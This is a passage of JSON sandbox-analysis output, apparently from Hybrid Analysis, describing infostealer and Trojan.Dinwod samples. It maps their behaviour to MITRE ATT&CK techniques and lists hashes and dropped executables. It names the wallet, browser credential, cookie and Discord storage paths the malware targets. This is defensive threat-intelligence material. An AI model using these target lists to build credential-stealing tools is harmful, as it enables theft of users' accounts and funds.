rights", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD1C0.tmp.dat\" with delete access\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD460.tmp.dat\" with delete access\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD471.tmp.dat\" with delete access\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD123.tmp.tmpdb\" with delete access\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD52D.tmp.tmpdb\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-30", "type": 3, "relevance": 5, "name": "Modifies file/console tracing settings (often used to hide footprints on system)", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "api-101", "type": 6, "relevance": 10, "name": "Tries to steal Crypto currency wallets information (file access)", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Zcash\\\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ATOMIC\\LOCAL STORAGE\\LEVELDB\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ELECTRUM\\WALLETS\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ETHEREUM\\KEYSTORE\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\EXODUS\\EXODUS.WALLET\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\COM.LIBERTY.JAXX\\INDEXEDDB\\FILE__0.INDEXEDDB.LEVELDB\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"%APPDATA%\\ATOMIC\\LOCAL STORAGE\\LEVELDB\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"%APPDATA%\\ELECTRUM\\WALLETS\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"%APPDATA%\\ETHEREUM\\KEYSTORE\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"%APPDATA%\\EXODUS\\EXODUS.WALLET\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"%APPDATA%\\COM.LIBERTY.JAXX\\INDEXEDDB\\FILE__0.INDEXEDDB.LEVELDB\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "api-96", "type": 6, "relevance": 10, "name": "Tries to steal browser sensitive information (file access)", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\CHROMIUM\\USER DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\WEB DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\LOGIN DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\COOKIES\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\LOGINS.JSON\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\KEY4.DB\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\places.sqlite\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\BOOKMARKS\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\BrowserMetrics\\WEB DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\BrowserMetrics\\LOGIN DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\BrowserMetrics\\COOKIES\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\BrowserMetrics\\BOOKMARKS\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateRevocation\\WEB DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateRevocation\\LOGIN DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateRevocation\\COOKIES\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateRevocation\\BOOKMARKS\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\ClientSidePhishing\\WEB DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\ClientSidePhishing\\LOGIN DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\ClientSidePhishing\\COOKIES\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\ClientSidePhishing\\BOOKMARKS\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\CommerceHeuristics\\WEB DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\CommerceHeuristics\\LOGIN DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\CommerceHeuristics\\COOKIES\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\CommerceHeuristics\\BOOKMARKS\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\WEB DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\LOGIN DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\COOKIES\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\BOOKMARKS\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Crowd Deny\\WEB DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Crowd Deny\\LOGIN DATA\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Crowd Deny\\COOKIES\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Crowd Deny\\BOOKMARKS\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\COOKIES\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\BOOKMARKS\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "api-281", "type": 6, "relevance": 10, "name": "Attempts to obtain browser login credentials (file access)", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to open a file \"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data\"", "origin": "API Call", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "api-97", "type": 6, "relevance": 10, "name": "Tries to steal desktop applications information (file access)", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\DISCORD\\LOCAL STORAGE\\LEVELDB\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"%APPDATA%\\DISCORD\\LOCAL STORAGE\\LEVELDB\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "api-46", "type": 6, "relevance": 5, "name": "Checks for files associated with bitcoin mining software", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" opened file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\bytecoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" opened file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\BYTECOIN\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" opened file \"%APPDATA%\\BYTECOIN\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084
https://hybrid-analysis.com/sample/3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084
Hybrid Analysis - Infostealers
{"size": 342106, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084", "sha256": "3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 109, "extracted_files": [{"name": "02242.exe", "file_path": "C:\\02242.exe", "file_size": 342872, "sha256": "dec3722f8ebd5911033dc6d7b97fc1a2d7e45dcd8bd77fb7453ef906e6fba192", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "626200.exe (PID: 568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "026288.exe", "file_path": "C:\\026288.exe", "file_size": 342378, "sha256": "86b25d2bb3d2379d52c195cb87c503c50d15af99a3d2157591e5a8e5f25a3f2a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "686200.exe (PID: 2528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "064826.exe", "file_path": "C:\\064826.exe", "file_size": 342798, "sha256": "1304d93251573a0a367a229934d85825ccaea55b7597faa8b9d14001db442208", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2246640.exe (PID: 1076)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "068420.exe", "file_path": "C:\\068420.exe", "file_size": 343029, "sha256": "31a25a0a51d206a4dde340815b405a5cdb08573af12647db2b126545f1cf2c5a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4640804.exe (PID: 2524)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "08684.exe", "file_path": "C:\\08684.exe", "file_size": 342586, "sha256": "2832cbde2504d643a342bb53bb71e6acc4718901ad80394f6d58b4c3794dd8e7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2084042.exe (PID: 2516)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2040668.exe", "file_path": "C:\\2040668.exe", "file_size": 342355, "sha256": "e9514ee1dca2d9ce908d31d0419c00d15e9a3312d1625aeb79f55ab41e6f1204", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4682600.exe (PID: 4448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2084042.exe", "file_path": "C:\\2084042.exe", "file_size": 342566, "sha256": "d8c085701931ae881563d66683d8b38829878ac4c000999bfd96e6e5a070b06b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "208666.exe (PID: 3768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "208666.exe", "file_path": "C:\\208666.exe", "file_size": 342547, "sha256": "2bee6b825941aec7dfa7885606866ead6cc2ea72909328e8814ecfccfc2fa75c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "208666.exe (PID: 3768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2246640.exe", "file_path": "C:\\2246640.exe", "file_size": 342784, "sha256": "53777c651d11ddd8ca5984631d92b57e3f7db8ef6a4950dfaf2ef1f9a3b3a351", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2246640.exe (PID: 1076)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22840.exe", "file_path": "C:\\22840.exe", "file_size": 342980, "sha256": "f42e895f194e57637b9bca2cc5dd7c9a7fdb2f867b11d15fbbbc58331248f35e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22840.exe (PID: 4588)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "240802.exe", "file_path": "C:\\240802.exe", "file_size": 342950, "sha256": "a72f4c22a2801e6ee86a1a7cc057e3bc43dcfbd7d724852a952f7b2a61c7efe9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "240802.exe (PID: 1768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2420222.exe", "file_path": "C:\\2420222.exe", "file_size": 342392, "sha256": "16353c635902d41eccb438cdaba5a99d85d0c2ff36b060bee178cbc3e56f087e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "026288.exe (PID: 1416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24642.exe", "file_path": "C:\\24642.exe", "file_size": 342962, "sha256": "e472c45ed660e672bc30ff3d7ee122f6e7ba816d5d3a5ffd35f93f853370db74", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "240802.exe (PID: 1768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2680282.exe", "file_path": "C:\\2680282.exe", "file_size": 342123, "sha256": "933a922ce0f3bae48b56382fd4b7b668ea90fe678ecf649159b6ca2b25c72209", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2680282.exe (PID: 3556)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "42828.exe", "file_path": "C:\\42828.exe", "file_size": 343049, "sha256": "1ba13b0a929eba94223c2abd1002dceba42149d81b98d8f59deaf6a821d48be6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "068420.exe (PID: 3296)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "44266.exe", "file_path": "C:\\44266.exe", "file_size": 342745, "sha256": "18cc91e39e36bc2918c1164caf2e0a67f19210d1167bf9dc1a73e734422375f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pjjdj.exe (PID: 3580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4640804.exe", "file_path": "C:\\4640804.exe", "file_size": 343017, "sha256": "ba38d75359cae443cfcbac540fca6bda99dd3d39af6b68674bbb363fb4f534ec", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4640804.exe (PID: 2524)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "46420.exe", "file_path": "C:\\46420.exe", "file_size": 342528, "sha256": "be050fe86a9cb8782798f4587cb16ff273158f72791667bb3c0620dc664b3e31", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4804042.exe (PID: 1460)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "464448.exe", "file_path": "C:\\464448.exe", "file_size": 342247, "sha256": "5764f7a7ddb93397704e0c0a4dd60aa39191b56bb8e9b74236c9bbd357e3311d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "464448.exe (PID: 3568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4682600.exe", "file_path": "C:\\4682600.exe", "file_size": 342338, "sha256": "19f319d361c8931496f485a00cc089a7627d9124670b6300e70cf00c9cb2067f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "84624.exe (PID: 3724)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4804042.exe", "file_path": "C:\\4804042.exe", "file_size": 342515, "sha256": "a98c2b69afb566639b6605c74a7adb43d55372d8c1326f8fa299f2198c47e32d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4804042.exe (PID: 1460)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6046286.exe", "file_path": "C:\\6046286.exe", "file_size": 342762, "sha256": "ee30a320719b5359230233250f215a3bdf4b72fabb418a8433767a87fb44f75b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6046286.exe (PID: 4520)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6088244.exe", "file_path": "C:\\6088244.exe", "file_size": 342403, "sha256": "bfa3d25212f7c7d50879e8c28724acea9f133c45495f4f0112f8fd47dd228ea1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6088244.exe (PID: 1696)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "626200.exe", "file_path": "C:\\626200.exe", "file_size": 342861, "sha256": "d21b86db77689df420280aa63a3d96a865905a5ea713b23f0462f707f7d72a3b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "626200.exe (PID: 568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6804604.exe", "file_path": "C:\\6804604.exe", "file_size": 343064, "sha256": "1297168e7d36ebbf5a13b3045ed4e6707559c23404b35c6df47584cd93dcb892", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42828.exe (PID: 4324)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "686200.exe", "file_path": "C:\\686200.exe", "file_size": 342365, "sha256": "006fa5ac127e1b1ad946eb9d5595daf7a4e30a52c0a96c3256a73d2749f2c3fe", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "686200.exe (PID: 2528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "826268.exe", "file_path": "C:\\826268.exe", "file_size": 342422, "sha256": "64606d9db0311f3c228b75eea1e0d9222168787407b3c2cd065719cecc4270f4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "826268.exe (PID: 2648)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "84624.exe", "file_path": "C:\\84624.exe", "file_size": 342324, "sha256": "d2f902942b8ed2f07df61b8b5c5fe30e6371f0353cf580150043b4774ffa8c03", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "84624.exe (PID: 3724)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "866846.exe", "file_path": "C:\\866846.exe", "file_size": 342999, "sha256": "c2f918dab93ed6b3d2aeee03c8c9e876d917419e2a067bdc10f8352a6e662133", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "866846.exe (PID: 3528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8682642.exe", "file_path": "C:\\8682642.exe", "file_size": 342774, "sha256": "10d73c8bbdeb86b0681f5ee170cad60a49eef7792220ff65052836e6b0d9b220", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6046286.exe (PID: 4520)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bjdjr.exe", "file_path": "C:\\bjdjr.exe", "file_size": 342843, "sha256": "f622187eced2d46cb176d166adbdc81df97d4f4f351f9520487c5c8b8027cb29", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fnjvr.exe (PID: 3944)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bnrhnlj.exe", "file_path": "C:\\bnrhnlj.exe", "file_size": 342668, "sha256": 